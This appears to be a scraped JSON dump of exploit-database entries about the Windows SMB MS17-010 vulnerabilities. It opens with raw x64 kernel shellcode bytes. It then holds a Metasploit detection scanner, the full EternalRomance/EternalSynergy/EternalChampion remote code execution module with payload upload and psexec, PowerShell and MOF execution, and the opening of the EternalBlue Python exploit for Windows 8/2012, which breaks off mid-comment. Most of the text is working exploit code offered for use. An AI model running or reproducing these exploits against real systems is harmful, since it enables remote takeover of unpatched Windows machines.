\"\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\\x4E\\x08\\x49\\xC7\\x01\\x00\" +\r\n \"\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\\xC9\\x48\\x89\\x0A\\x48\\xF7\" +\r\n \"\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\\x20\\xE8\\x52\\x01\\x00\\x00\" +\r\n \"\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\\x3E\\x48\\x8D\\x35\\xE9\\x00\" +\r\n \"\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\\x00\\x66\\x81\\xC1\\xF9\\x00\" +\r\n \"\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x48\\x89\\xF1\\x48\" +\r\n \"\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\\x48\\x83\\xEC\\x20\\x41\\xBB\" +\r\n \"\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\\x83\\xC4\\x20\\x5A\\x59\\x48\" +\r\n \"\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\\x00\\x48\\x85\\xC0\\x74\\x0C\" +\r\n \"\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\\x72\\x05\\x48\\x8B\\x09\\xEB\" +\r\n \"\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\\x80\\xC2\\x90\\x31\\xC9\\x41\" +\r\n \"\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\\x48\\x89\\xC1\\x4C\\x8D\\x89\" +\r\n \"\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\\xE2\\x49\\x89\\xC4\\x4D\\x31\" +\r\n \"\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\\x50\\x48\\x83\\xEC\\x20\\x41\" +\r\n \"\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\\x31\\xD2\\x52\\x52\\x41\\x58\" +\r\n \"\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\\x9E\\xE8\\x82\\x00\\x00\\x00\" +\r\n \"\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\\x74\\x00\\x00\\x00\\x48\\x89\" +\r\n \"\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\\x00\\x00\\x48\\x89\\xEC\\x5D\" +\r\n \"\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\\xC3\\xE9\\xB5\\x00\\x00\\x00\" +\r\n \"\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x3C\\x61\\x7C\\x02\\x2C\\x20\" +\r\n \"\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\" +\r\n \"\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\\x48\\x8B\\x72\\x50\\x48\\x0F\" +\r\n \"\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\" +\r\n \"\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\" +\r\n \"\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xC2\\x8B\" +\r\n \"\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xD0\\x50\\x8B\" +\r\n \"\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\" +\r\n \"\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\\xD9\\x75\\xEC\\x58\\x44\\x8B\" +\r\n \"\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\\x01\" +\r\n \"\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\\x5A\\x41\\x58\\x41\\x59\\x41\" +\r\n \"\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\\x89\\xE5\\x48\\x83\\xEC\\x20\" +\r\n \"\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\\xFF\\x31\\xC9\\x51\\x51\\x51\" +\r\n \"\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\\x5A\\x48\\x83\\xEC\\x20\\x41\" +\r\n \"\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\\x48\\x89\\xEC\\x5D\\x41\\x5F\" +\r\n \"\\x5E\\xC3\"\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/27786", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T11:22:44", "description": "This Metasploit module uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. This Metasploit module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.", "cvss3": {}, "published": "2017-04-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - Uncredentialed SMB RCE (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-04-17T00:00:00", "id": "1337DAY-ID-27613", "href": "https://0day.today/exploit/description/27613", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\n# auxiliary/scanner/smb/smb_ms_17_010\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n \r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 SMB RCE Detection',\r\n 'Description' => %q{\r\n Uses information disclosure to determine if MS17-010 has been patched or not.\r\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\r\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\r\n not have the MS17-010 patch.\r\n \r\n This module does not require valid SMB credentials in default server\r\n configurations. It can log on as the user \"\\\" and connect to IPC$.\r\n },\r\n 'Author' => [ 'Sean Dillon <[email\u00a0protected]>' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-0143'],\r\n [ 'CVE', '2017-0144'],\r\n [ 'CVE', '2017-0145'],\r\n [ 'CVE', '2017-0146'],\r\n [ 'CVE', '2017-0147'],\r\n [ 'CVE', '2017-0148'],\r\n [ 'MSB', 'MS17-010'],\r\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\r\n ],\r\n 'License' => MSF_LICENSE\r\n ))\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n status = do_smb_probe(ip)\r\n \r\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\r\n print_warning(\"Host is likely VULNERABLE to MS17-010!\")\r\n report_vuln(\r\n host: ip,\r\n name: self.name,\r\n refs: self.references,\r\n info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$'\r\n )\r\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\r\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\r\n print_good(\"Host does NOT appear vulnerable.\")\r\n else\r\n print_bad(\"Unable to properly detect if host is vulnerable.\")\r\n end\r\n \r\n rescue ::Interrupt\r\n print_status(\"Exiting on interrupt.\")\r\n raise $!\r\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\r\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\r\n rescue ::Exception => e\r\n vprint_error(\"#{e.class}: #{e.message}\")\r\n ensure\r\n disconnect\r\n end\r\n end\r\n \r\n def do_smb_probe(ip)\r\n connect\r\n \r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n \r\n # connect to IPC$\r\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\r\n simple.connect(ipc_share)\r\n tree_id = simple.shares[ipc_share]\r\n \r\n print_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\r\n \r\n # request transaction with fid = 0\r\n pkt = make_smb_trans_ms17_010(tree_id)\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n \r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n \r\n # convert error code to string\r\n code = pkt['SMB'].v['ErrorClass']\r\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\r\n status = smberr.get_error(code)\r\n \r\n print_status(\"Received #{status} with FID = 0\")\r\n status\r\n end\r\n \r\n def make_smb_trans_ms17_010(tree_id)\r\n # make a raw transaction packet\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n \r\n # opcode 0x23 = PeekNamedPipe, fid = 0\r\n setup = \"\\x23\\x00\\x00\\x00\"\r\n setup_count = 2 # 2 words\r\n trans = \"\\\\PIPE\\\\\\x00\"\r\n \r\n # calculate offsets to the SetupData payload\r\n base_offset = pkt.to_s.length + (setup.length) - 4\r\n param_offset = base_offset + trans.length\r\n data_offset = param_offset # + 0\r\n \r\n # packet baselines\r\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\r\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload'].v['ParamCountMax'] = 0xffff\r\n pkt['Payload'].v['DataCountMax'] = 0xffff\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n \r\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup\r\n pkt['Payload'].v['Payload'] = trans\r\n \r\n pkt.to_s\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/27613", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-01T23:39:17", "description": "This Metasploit module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.", "cvss3": {}, "published": "2018-02-03T00:00:00", "type": "zdt", "title": "Microsoft Windows SMB MS17-010 EternalRomance / EternalSynergy / EternalChampion Remote Code Executi", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "modified": "2018-02-03T00:00:00", "id": "1337DAY-ID-29702", "href": "https://0day.today/exploit/description/29702", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# Windows XP systems that are not part of a domain default to treating all\r\n# network logons as if they were Guest. This prevents SMB relay attacks from\r\n# gaining administrative access to these systems. This setting can be found\r\n# under:\r\n#\r\n# Local Security Settings >\r\n# Local Policies >\r\n# Security Options >\r\n# Network Access: Sharing and security model for local accounts\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::WbemExec\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\r\n 'Description' => %q{\r\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\r\n primitive. This will then be used to overwrite the connection session information with as an\r\n Administrator session. From there, the normal psexec payload code execution is done.\r\n\r\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\r\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\r\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\r\n named pipe.\r\n },\r\n 'Author' =>\r\n [\r\n 'sleepya', # zzz_exploit idea and offsets\r\n 'zerosum0x0',\r\n 'Shadow Brokers',\r\n 'Equation Group'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10,\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'References' =>\r\n [\r\n [ 'AKA', 'ETERNALSYNERGY' ],\r\n [ 'AKA', 'ETERNALROMANCE' ],\r\n [ 'AKA', 'ETERNALCHAMPION' ],\r\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\r\n [ 'MSB', 'MS17-010' ],\r\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\r\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\r\n [ 'CVE', '2017-0147'], # for EternalRomance reference\r\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\r\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\r\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 3072,\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n [ 'PowerShell', { } ],\r\n [ 'Native upload', { } ],\r\n [ 'MOF upload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 14 2017'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\r\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\r\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\r\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\r\n ])\r\n end\r\n\r\n def exploit\r\n begin\r\n eternal_pwn(datastore['RHOST'])\r\n smb_pwn()\r\n\r\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\r\n print_error(\"#{e.message}\")\r\n rescue ::Errno::ECONNRESET,\r\n ::Rex::Proto::SMB::Exceptions::LoginError,\r\n ::Rex::HostUnreachable,\r\n ::Rex::ConnectionTimeout,\r\n ::Rex::ConnectionRefused => e\r\n print_error(\"#{e.class}: #{e.message}\")\r\n rescue => error\r\n print_error(error.class.to_s)\r\n print_error(error.message)\r\n print_error(error.backtrace.join(\"\\n\"))\r\n ensure\r\n eternal_cleanup() # restore session\r\n end\r\n end\r\n\r\n def smb_pwn()\r\n case target.name\r\n when 'Automatic'\r\n if powershell_installed?\r\n print_status('Selecting PowerShell target')\r\n powershell\r\n else\r\n print_status('Selecting native target')\r\n native_upload\r\n end\r\n when 'PowerShell'\r\n powershell\r\n when 'Native upload'\r\n native_upload\r\n when 'MOF upload'\r\n mof_upload\r\n end\r\n\r\n handler\r\n end\r\n\r\n\r\n # TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to\r\n # be moved into a mixin\r\n\r\n def powershell_installed?\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\#{datastore['SHARE']}\"\r\n\r\n case datastore['SHARE'].upcase\r\n when 'ADMIN$'\r\n path = 'System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n when 'C$'\r\n path = 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n else\r\n path = datastore['PSH_PATH']\r\n end\r\n\r\n simple.connect(share)\r\n\r\n vprint_status(\"Checking for #{path}\")\r\n\r\n if smb_file_exist?(path)\r\n vprint_status('PowerShell found')\r\n psh = true\r\n else\r\n vprint_status('PowerShell not found')\r\n psh = false\r\n end\r\n\r\n simple.disconnect(share)\r\n\r\n psh\r\n end\r\n\r\n def powershell\r\n ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']\r\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n\r\n if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']\r\n print_warning(\"You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option\")\r\n end\r\n\r\n # Execute the powershell command\r\n print_status(\"Executing the payload...\")\r\n begin\r\n psexec(command)\r\n rescue StandardError => exec_command_error\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to execute specified command: #{exec_command_error}\")\r\n end\r\n end\r\n\r\n def native_upload\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)\r\n serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''\r\n\r\n # Upload the shellcode to a file\r\n print_status(\"Uploading payload...\")\r\n smbshare = datastore['SHARE']\r\n fileprefix = \"\"\r\n # if SHARE = Users/sasha/ or something like this\r\n if smbshare =~ /.[\\\\\\/]/\r\n subfolder = true\r\n smbshare = datastore['SHARE'].dup\r\n smbshare = smbshare.gsub(/^[\\\\\\/]/,\"\")\r\n folder_list = smbshare.split(/[\\\\\\/]/)\r\n smbshare = folder_list[0]\r\n fileprefix = folder_list[1..-1].map {|a| a + \"\\\\\"}.join.gsub(/\\\\$/,\"\") if folder_list.length > 1\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#{fileprefix}\\\\#{filename}\", 'rwct')\r\n else\r\n subfolder = false\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#{filename}\", 'rwct')\r\n end\r\n exe = ''\r\n opts = { :servicename => servicename, :serviceencoder => serviceencoder}\r\n begin\r\n exe = generate_payload_exe_service(opts)\r\n\r\n fd << exe\r\n ensure\r\n fd.close\r\n end\r\n\r\n if subfolder\r\n print_status(\"Created \\\\#{fileprefix}\\\\#{filename}...\")\r\n else\r\n print_status(\"Created \\\\#{filename}...\")\r\n end\r\n\r\n # Disconnect from the share\r\n simple.disconnect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n\r\n # define the file location\r\n if datastore['SHARE'] == 'ADMIN$'\r\n file_location = \"%SYSTEMROOT%\\\\#{filename}\"\r\n elsif datastore['SHARE'] =~ /^[a-zA-Z]\\$$/\r\n file_location = datastore['SHARE'].slice(0,1) + \":\\\\#{filename}\"\r\n else\r\n file_location = \"\\\\\\\\127.0.0.1\\\\#{smbshare}\\\\#{fileprefix}\\\\#{filename}\"\r\n end\r\n\r\n psexec(file_location, false)\r\n\r\n unless datastore['SERVICE_PERSIST']\r\n print_status(\"Deleting \\\\#{filename}...\")\r\n #This is not really useful but will prevent double \\\\ on the wire :)\r\n if datastore['SHARE'] =~ /.[\\\\\\/]/\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#{fileprefix}\\\\#{filename}\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#{fileprefix}\\\\#{filename} failed: #{e.message}\")\r\n end\r\n else\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#{filename}\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#{filename} failed: #{e.message}\")\r\n end\r\n end\r\n end\r\n end\r\n\r\n def mof_upload\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\ADMIN$\"\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n\r\n # payload as exe\r\n print_status(\"Trying wbemexec...\")\r\n print_status(\"Uploading Payload...\")\r\n if datastore['SHARE'] != 'ADMIN$'\r\n print_error('Wbem will only work with ADMIN$ share')\r\n return\r\n end\r\n simple.connect(share)\r\n exe = generate_payload_exe\r\n fd = smb_open(\"\\\\system32\\\\#{filename}\", 'rwct')\r\n fd << exe\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\#{filename}\")\r\n\r\n # mof to cause execution of above\r\n mofname = rand_text_alphanumeric(14) + \".MOF\"\r\n mof = generate_mof(mofname, filename)\r\n print_status(\"Uploading MOF...\")\r\n fd = smb_open(\"\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\", 'rwct')\r\n fd << mof\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\")\r\n\r\n # Disconnect from the ADMIN$\r\n simple.disconnect(share)\r\n end\r\n\r\n def report_auth\r\n service_data = {\r\n address: ::Rex::Socket.getaddress(datastore['RHOST'],true),\r\n port: datastore['RPORT'],\r\n service_name: 'smb',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: self.fullname,\r\n private_data: datastore['SMBPass'],\r\n username: datastore['SMBUser'].downcase\r\n }\r\n\r\n if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'\r\n credential_data.merge!({\r\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\r\n realm_value: datastore['SMBDomain']\r\n })\r\n end\r\n\r\n if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/\r\n credential_data.merge!({:private_type => :ntlm_hash})\r\n else\r\n credential_data.merge!({:private_type => :password})\r\n end\r\n\r\n credential_data.merge!(service_data)\r\n\r\n credential_core = create_credential(credential_data)\r\n\r\n login_data = {\r\n access_level: 'Admin',\r\n core: credential_core,\r\n last_attempted_at: DateTime.now,\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL\r\n }\r\n\r\n login_data.merge!(service_data)\r\n create_credential_login(login_data)\r\n end\r\nend\n\n# 0day.today [2018-03-01] #", "sourceHref": "https://0day.today/exploit/29702", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T23:01:39", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "zdt", "title": "Microsoft Windows 8 / 2012 R2 (x64) - EternalBlue SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-19T00:00:00", "id": "1337DAY-ID-27803", "href": "https://0day.today/exploit/description/27803", "sourceData": "#!/usr/bin/python\r\nfrom impacket import smb\r\nfrom struct import pack\r\nimport os\r\nimport sys\r\nimport socket\r\n \r\n'''\r\nEternalBlue exploit for Windows 8 and 2012 by sleepya\r\nThe exploit might FAIL and CRASH a target system (depended on what is overwritten)\r\nThe exploit support only x64 target\r\nTested on:\r\n- Windows 2012 R2 x64\r\n- Windows 8.1 x64\r\nDefault Windows 8 and later installation without additional service info:\r\n- anonymous is not allowed to access any share (including IPC$)\r\n- tcp port 445 if filtered by firewall\r\nReference:\r\n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\r\nExploit info:\r\n- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\r\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\r\n- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\r\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.\r\n- The exploit is likely to crash a target when it failed\r\n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\r\n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)\r\n- See the code and comment for exploit detail.\r\nDisable NX method:\r\n- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\r\n- The exploit is also the same but we need to trigger bug twice\r\n- First trigger, set MDL.MappedSystemVa to target pte address\r\n - Write '\\x00' to disable the NX flag\r\n- Second trigger, do the same as Windows 7 exploit\r\n- From my test, if exploit disable NX successfully, I always get code execution\r\n'''\r\n \r\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\r\nNTFEA_SIZE = 0x9000\r\n \r\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\r\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\r\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\r\n \r\n'''\r\nReverse from srvnet.sys (Win2012 R2 x64)\r\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\r\n// size 0x90\r\nstruct SRVNET_BUFFER_HDR {\r\n LIST_ENTRY list;\r\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside.\r\n char unknown0[6];\r\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\r\n DWORD netRawBufferSize; // offset: 0x20\r\n DWORD ioStatusInfo;\r\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\r\n DWORD pad2;\r\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\r\n PMDL pmdl1; // point at offset 0x90 from this struct\r\n DWORD nByteProcessed; // 0x40\r\n char unknown4[4];\r\n QWORD smbMsgSize; // MUST be modified to size of all recv data\r\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\r\n QWORD pSrvNetWskStruct; // want to change to fake struct address\r\n DWORD unknown6; // 0x60\r\n char unknown7[12];\r\n char unknown8[0x20];\r\n};\r\nstruct SRVNET_BUFFER {\r\n char transportHeader[80]; // 0x50\r\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\r\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\r\n //MDL mdl1; // target\r\n};\r\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.\r\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and \r\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\r\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\r\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\r\n'''\r\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\r\n# Here is the important fields on x64\r\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is\r\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\r\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\r\n# This value MUST be exactly same as the number of bytes we send.\r\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\r\n# - offset 0x58 (VOID*) : 